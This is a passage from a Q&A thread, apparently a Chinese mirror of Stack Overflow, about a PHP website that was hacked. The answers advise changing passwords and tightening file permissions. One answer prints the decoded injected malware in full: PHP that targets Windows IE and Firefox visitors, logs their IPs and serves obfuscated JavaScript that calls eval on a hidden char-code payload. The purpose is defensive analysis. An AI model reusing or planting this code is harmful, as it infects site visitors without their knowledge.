-5
4

3 回答 3

2

问题是您的 PHP 代码本身被黑了。您可以尝试对所有文本进行 base64 解码以查看它在做什么,但是某人或某物有权修改您的 PHP 文件。javascript与它无关。

如果你正在运行类似 wordpress 的东西,你可以看到他们推荐的内容。不过,首先,您需要更改所有密码。然后看看有人是如何修改你的代码的。并确保您的文件不可写(例如,尝试 755 而不是 777)。

于 2012-09-12T16:01:54.740 回答
1

您的页面中似乎有一个 html (php) 块。可能是XSS的结果?

第一阶段解码显示:

$ip=$_SERVER["REMOTE_ADDR"];$dr=$_SERVER["DOCUMENT_ROOT"];$ua = $_SERVER['HTTP_USER_AGENT'];$dbf=$dr.'/'.md5($dr.'1');
if((strpos($ua,'Windows')!==false)&&((strpos($ua,'MSIE')!==false)||(strpos($ua,'Firefox')!==false))&&(strpos(@file_get_contents($dbf),$ip) === false)){
    error_reporting(0);
    echo(base64_decode('PHNjcmlwdD50cnl7YWJyZSsrfWNhdGNoKGE2YmEzNHkpe3RyeXtwcm90b3R5cGUmMn1jYXRjaChhc2FiKXtlPXdpbmRvd1siZSIrInYiKyJhbCJdO319IGlmKDEpe2Y9Wy00LC01LDkwLDg5LDE4LDI1LDg3LDk3LDg0LDEwNCw5NSw4Niw5NywxMDIsMzEsOTAsODcsMTAxLDU2LDk0LDg2LDk2LDg3LDk1LDEwMywxMDEsNTEsMTA4LDcwLDgyLDkwLDY0LDgyLDk2LDg3LDI1LDI2LDg0LDk2LDg3LDEwNywyNCwyOCw3NywzMyw4MCwyNywxMDgsMCwtNSwtNiwtNCw5MSw4NywxMDEsODMsOTQsODgsMTAwLDI1LDI4LDQ1LC0yLC00LC01LDExMCwxOSw4Nyw5MywxMDIsODcsMTcsMTEwLC0xLC02LC00LC01LDg1LDk4LDg1LDEwMiw5Niw4Nyw5NSwxMDMsMzIsMTA0LDEwMSw5MSwxMDEsODgsMjYsMTksNDcsOTEsODcsMTAxLDgzLDk0LDg4LDE4LDEwMCwxMDEsODUsNDYsMjYsOTAsMTAxLDEwMyw5OCw0MywzNCwzMywxMDIsOTIsMTA3LDEwNyw5NCw5Miw5OSwzMyw4NywxMDcsMTA0LDgzLDMxLDg2LDk3LDk0LDM0LDEwNCw4NCwzMyw5OCw4OSw5OSw0OSw4OCw5OCw0NywzNSwyNiwxOCwxMDQsOTIsODYsMTAxLDkxLDQ3LDI0LDM2LDM0LDI0LDE5LDkwLDg2LDkyLDg5LDg5LDEwMyw0NywyNCwzNiwzNCwyNCwxOSwxMDEsMTAxLDEwOCw5NCw4Niw0OCwyNSwxMDMsOTIsMTAxLDkwLDg1LDkxLDkzLDkyLDEwMiwxMDYsNDUsOTAsOTAsODcsODYsODYsOTcsNDUsOTcsOTgsMTAxLDkwLDEwMyw5MSw5Niw5Nyw0NCw4Miw4NSwxMDEsOTYsOTUsMTAzLDEwMSw4OCw0NSw5Myw4OCw4OCwxMDEsNDUsMzQsNDQsMTAzLDk3LDk3LDQ1LDM0LDQ0LDI2LDQ4LDQ1LDM0LDkxLDg3LDEwMSw4Myw5NCw4OCw0OCwxOSwyOCw0NSwtMiwtNCwtNSwxMTAsMCwtNSwtNiw4OSwxMDMsOTUsODYsMTAyLDkwLDk4LDk2LDE3LDkyLDg4LDk5LDg0LDk1LDg2LDEwMSwyNiwyNiwxMTAsLTEsLTYsLTQsLTUsMTAzLDg0LDEwMCwxNyw4OSwxOCw0NiwxOSw4Niw5Niw4NiwxMDMsOTQsODgsOTYsMTAxLDMzLDg1LDk5LDg4LDgzLDEwMSw4OCw1NSw5Myw4OCw5NSw4Niw5NywxMDIsMjUsMjYsOTEsODcsMTAxLDgzLDk0LDg4LDI1LDI2LDQ2LDg4LDMxLDEwMiw4NywxMDEsNTIsMTAyLDEwMSwxMDEsOTEsODMsMTA0LDEwMiw4NiwyNywyNSwxMDAsMTAxLDg1LDI0LDMxLDI1LDg5LDEwMywxMDIsOTcsNDUsMzMsMzIsMTA0LDkxLDEwNiwxMDksOTMsOTEsMTAxLDMyLDg2LDEwOSwxMDMsODIsMzMsODUsOTYsOTYsMzMsMTAzLDg2LDMyLDk3LDkxLDk4LDQ4LDkwLDk3LDQ2LDM3LDI1LDI2LDQ2LDg4LDMxLDEwMiwxMDIsMTA2LDk1LDg3LDMxLDEwNSw5MSwxMDAsOTIsODQsOTAsOTUsOTEsMTAxLDEwOCw0NywyNCw5MSw5MSw4NSw4Nyw4Nyw5NSwyNiw0NSw4NywzMywxMDEsMTAxLDEwOCw5NCw4NiwzMyw5OCw5NiwxMDIsOTEsMTAxLDkyLDk3LDk1LDQ4LDI1LDgyLDg1LDEwMSw5Niw5NSwxMDMsMTAxLDg4LDI1LDQ0LDg5LDMyLDEwMCwxMDMsMTA3LDkzLDg4LDMyLDkzLDg4LDg4LDEwMSw0OCwyNSwzMywyNiw0NSw4NywzMywxMDEsMTAxLDEwOCw5NCw4NiwzMywxMDIsOTYsOTksNDcsMjQsMzUsMjUsNDQsODksMzIsMTAwLDg4LDEwMiw1MCwxMDMsMTAyLDk5LDkyLDg0LDEwMiwxMDMsODcsMjUsMjYsMTA1LDkwLDg3LDEwMiw4OSwyNiwzMCwyNCwzNiwzNCwyNCwyOCw0NSw4NywzMywxMDEsODYsMTAzLDUxLDEwMSwxMDMsMTAwLDkwLDg1LDEwMywxMDEsODgsMjYsMjQsOTEsODcsOTAsOTAsOTAsMTAxLDI2LDMwLDI0LDM2LDM0LDI0LDI4LDQ1LC0yLC00LC01LC02LDg3LDk3LDg0LDEwNCw5NSw4Niw5NywxMDIsMzEsOTAsODcsMTAxLDU2LDk0LDg2LDk2LDg3LDk1LDEwMywxMDEsNTEsMTA4LDcwLDgyLDkwLDY0LDgyLDk2LDg3LDI1LDI2LDg0LDk2LDg3LDEwNywyNCwyOCw3NywzMyw4MCwzMiw4Miw5OSw5OCw4Niw5Nyw4Niw1Miw5MSw5MSw5Myw4NywyNiw4NywyOCw0NSwtMiwtNCwtNSwxMTBdO313PWY7cz1bXTtyPVN0cmluZzt4PSJqJSI7Zm9yKGk9MDstaSs1NzkhPTA7aSs9MSl7aj1pO2lmKGUmJigwMzE9PTB4MTkpKXM9cytyLmZyb21DaGFyQ29kZSgoMSp3W2pdK2UoeCszKSsxMykpO30gdHJ5e2FzZ2FzZyYxM31jYXRjaChhc2dhKXtlKHMpO308L3NjcmlwdD4='));
    if ($fp = @fopen($dbf , "a")){fputs($fp , $ip.'|'); fclose($fp);}
}

第二阶段解码显示:

try {
    abre++
} catch (a6ba34y) {
    try {
        prototype & 2
    } catch (asab) {
        e = window["e" + "v" + "al"];
    }
}
if (1) {
    f = [-4, - 5, 90, 89, 18, 25, 87, 97, 84, 104, 95, 86, 97, 102, 31, 90, 87, 101, 56, 94, 86, 96, 87, 95, 103, 101, 51, 108, 70, 82, 90, 64, 82, 96, 87, 25, 26, 84, 96, 87, 107, 24, 28, 77, 33, 80, 27, 108, 0, - 5, - 6, - 4, 91, 87, 101, 83, 94, 88, 100, 25, 28, 45, - 2, - 4, - 5, 110, 19, 87, 93, 102, 87, 17, 110, - 1, - 6, - 4, - 5, 85, 98, 85, 102, 96, 87, 95, 103, 32, 104, 101, 91, 101, 88, 26, 19, 47, 91, 87, 101, 83, 94, 88, 18, 100, 101, 85, 46, 26, 90, 101, 103, 98, 43, 34, 33, 102, 92, 107, 107, 94, 92, 99, 33, 87, 107, 104, 83, 31, 86, 97, 94, 34, 104, 84, 33, 98, 89, 99, 49, 88, 98, 47, 35, 26, 18, 104, 92, 86, 101, 91, 47, 24, 36, 34, 24, 19, 90, 86, 92, 89, 89, 103, 47, 24, 36, 34, 24, 19, 101, 101, 108, 94, 86, 48, 25, 103, 92, 101, 90, 85, 91, 93, 92, 102, 106, 45, 90, 90, 87, 86, 86, 97, 45, 97, 98, 101, 90, 103, 91, 96, 97, 44, 82, 85, 101, 96, 95, 103, 101, 88, 45, 93, 88, 88, 101, 45, 34, 44, 103, 97, 97, 45, 34, 44, 26, 48, 45, 34, 91, 87, 101, 83, 94, 88, 48, 19, 28, 45, - 2, - 4, - 5, 110, 0, - 5, - 6, 89, 103, 95, 86, 102, 90, 98, 96, 17, 92, 88, 99, 84, 95, 86, 101, 26, 26, 110, - 1, - 6, - 4, - 5, 103, 84, 100, 17, 89, 18, 46, 19, 86, 96, 86, 103, 94, 88, 96, 101, 33, 85, 99, 88, 83, 101, 88, 55, 93, 88, 95, 86, 97, 102, 25, 26, 91, 87, 101, 83, 94, 88, 25, 26, 46, 88, 31, 102, 87, 101, 52, 102, 101, 101, 91, 83, 104, 102, 86, 27, 25, 100, 101, 85, 24, 31, 25, 89, 103, 102, 97, 45, 33, 32, 104, 91, 106, 109, 93, 91, 101, 32, 86, 109, 103, 82, 33, 85, 96, 96, 33, 103, 86, 32, 97, 91, 98, 48, 90, 97, 46, 37, 25, 26, 46, 88, 31, 102, 102, 106, 95, 87, 31, 105, 91, 100, 92, 84, 90, 95, 91, 101, 108, 47, 24, 91, 91, 85, 87, 87, 95, 26, 45, 87, 33, 101, 101, 108, 94, 86, 33, 98, 96, 102, 91, 101, 92, 97, 95, 48, 25, 82, 85, 101, 96, 95, 103, 101, 88, 25, 44, 89, 32, 100, 103, 107, 93, 88, 32, 93, 88, 88, 101, 48, 25, 33, 26, 45, 87, 33, 101, 101, 108, 94, 86, 33, 102, 96, 99, 47, 24, 35, 25, 44, 89, 32, 100, 88, 102, 50, 103, 102, 99, 92, 84, 102, 103, 87, 25, 26, 105, 90, 87, 102, 89, 26, 30, 24, 36, 34, 24, 28, 45, 87, 33, 101, 86, 103, 51, 101, 103, 100, 90, 85, 103, 101, 88, 26, 24, 91, 87, 90, 90, 90, 101, 26, 30, 24, 36, 34, 24, 28, 45, - 2, - 4, - 5, - 6, 87, 97, 84, 104, 95, 86, 97, 102, 31, 90, 87, 101, 56, 94, 86, 96, 87, 95, 103, 101, 51, 108, 70, 82, 90, 64, 82, 96, 87, 25, 26, 84, 96, 87, 107, 24, 28, 77, 33, 80, 32, 82, 99, 98, 86, 97, 86, 52, 91, 91, 93, 87, 26, 87, 28, 45, - 2, - 4, - 5, 110];
}
w = f;
s = [];
r = String;
x = "j%";
for (i = 0; - i + 579 != 0; i += 1) {
    j = i;
    if (e && (031 == 0x19)) s = s + r.fromCharCode((1 * w[j] + e(x + 3) + 13));
}
try {
    asgasg & 13
} catch (asga) {
    e(s);
}

然后通过 Javascript Packer 进一步混淆了有效负载。对于那些有兴趣看到这个功能的人,我会在下午晚些时候再玩这个......

于 2012-09-12T16:11:14.260 回答
-1

如果您使用的是 PHP,您可以只使用标头重定向,那么您不必担心 JavaScript 漏洞:

header('Location: http://www.example.com/');

这必须在任何内容输出到 DOM 之前进行。如果 SEO 是一个因素,您也可以考虑使用 .htaccess 重定向。

于 2012-09-12T15:59:48.850 回答